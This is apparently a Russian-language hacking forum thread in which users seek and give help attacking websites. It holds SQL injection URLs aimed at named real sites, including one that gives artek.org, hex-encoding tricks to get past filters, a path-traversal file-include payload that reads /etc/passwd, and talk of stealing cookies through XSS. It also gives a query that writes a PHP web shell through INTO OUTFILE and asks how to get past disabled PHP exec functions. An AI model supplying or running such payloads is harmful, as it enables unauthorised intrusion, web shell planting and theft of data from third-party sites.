кто небудь знает как извлечь данные из таблицы pref_tabl Если pref_ фильтруется, происходит die(); можно ли как-нибудь закодировать имя таблицы, чтобы запрос остался рабочим? Какие варианты?
вы думаете ,что я настолько глуп? я же говорю изменяю '669' вылазит уже mysql ошибка ,а мне нужен очень инклуд. Может ошибка гдето в скпите и вообще нету инклуда тут?
2 o3,14um: mysql hex -> unhex ( unhex(hexedstr) ), через php проходит в хексе, в мускуле как мы знаем преобразовывается, следовательно префикс должен порйти через фильтры в php. а -ля: +WHERE+table_name=0x707265665F7461626C(pref_tabl) 2 blesse: Четко и ясно написано в error: INCLUDE. Из базы берется согласно идентификатору имя файла и инклудится. Теоретически, сформировав корректный mysql inject запрос, в поле вывода, которое подставляется в качестве аргумента в include, можно реализовать задуманное. Но во первых, поле может некорректно формироваться в следствие некоторых факторов при mysql-inj, к тому же эксепшены и тп могут явно подавлять последующий инклуд при некорректном mysql запросе и тп. Может быть такое что скуля сформирована, параметр в инклуд передается, но визуально это явно не отображается.
Cennarios 2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
Да, на самом деле. Не думаю что фильтр настолько туп ,чтобы вида (символ)pref_ пропускал ) Моя невнимательность.
Нешел другой инклуд: http://site/patch/index.php?X=G&F=blalalal Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37 Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37 Fatal error: require() [function.require]: Failed opening required 'namesutf8-blalalal' (include_path='.:') in /x/x/x/x/x/x/index.php on line 37 как я понимаю тоже бесполезный? при изменеии переменной в ошибке оставется часть namesutf8- Т.Е. при http://site/patch/index.php?X=G&F=../../../../../../../../etc/passwd%00 вылазит: Warning: require(namesutf8-../../../../../../../../etc/passwd)
Античат, помоги. Есть некая страница. page.php?text=Тест этот text параметр выводится на странице. XSS работает, пробовал alert. Фильтрации нет вообще видимо. Можно ли как то вставить туда php код?
Жаль. А что можно с этого полезного поиметь? Страница общедоступна. Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?
http://www.dialogas.com/senoji/index.php?lng=lt&content=pages&page_id=-52+union+select+table_name+from+information_schema.tables+--+ не сталкивался раньше с таким, фильтруется from, можно как-то обойти?
Нашел скулю на сайте Артека, в базе не нашел паролей. Админка расположнена по адресу artek.org/admin/ но там базовая авторизация. Можно ли получить что то полезное со скули? Как можно зайти в админку?
Есть такой код: PHP: $res=mysql_query("SELECT username FROM users WHERE username='$utente' AND id<>".max(0,$_POST["uid"])); Заинтересовало меня то, что в функцию max() передается не фильтрованное значение. Так вот, если передать в max() строку - она представляется как 0, сравнится с первым и большее возвратится. Прикол в том, что max возвращает строку. Тоесть: max(-1,'string) возвратит string, т.к. -1<0 max(0, 'string') возвратит 0, т.к. 0=0, и при равных значениях функция вернет первое. Но есть еще 1 фича! Если немассив сравнивать с массивом - возвращается всегда массив! Тоесть, max(100500, array(0,1), 'string') вернет array(0,1)! А теперь вопрос, получится ли провести инъекцию, если передать строку массивом?
Не получается залить шелл через mysql. Права рутовые. Подключась навикатом. Делаю так: Code: SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/home/l2/public_html/images/sh.php' Не получается.
Учите матчасть! root пользователь mysql в данном случае обеспечивает FILE_PRIV. root mysql никакого отношения к system user ROOT не имеет. Все операции от пользователя под которым запущен mysql сервер (обычно mysql системный юзер). Как вам и советуют - надо искать директории на которые выставлены права на запись для кого-либо помимо овнера.
Помогите, Zenmap пишет, что ос linux 2.6.15-2.6.26 с точностью 96%, и что на 80 порту находится microsoft iis httpd 6.0. По моим представлениям microsoft iis должен стоять на windows, да и регистр букв в адресе роли не играет. Значит ли это что там windows, и как можно точно определить версию ос? Можно ли верить что там microsoft iis httpd 6.0? Какие на него есть эксплойты? Посоветуйте пожалуйста, чем лучше просканировать хост?
Есть freebsd, в php отключены popen,exec,system,passthru,proc_open,shell_exec. Делал в отдельной папке, чмод 755 на скрипт, папка тоже 755, htaccess с текстом Code: Options +ExecCGI AddHandler cgi-script cgi pl При обращении к скрипту через браузер получаю исходный код. Может, неверно указывал пути к перлу, но проверить это не могу, т.к. open_base_dir, пробовал самые распространенные. Как можно запустить перл скрипт из браузера?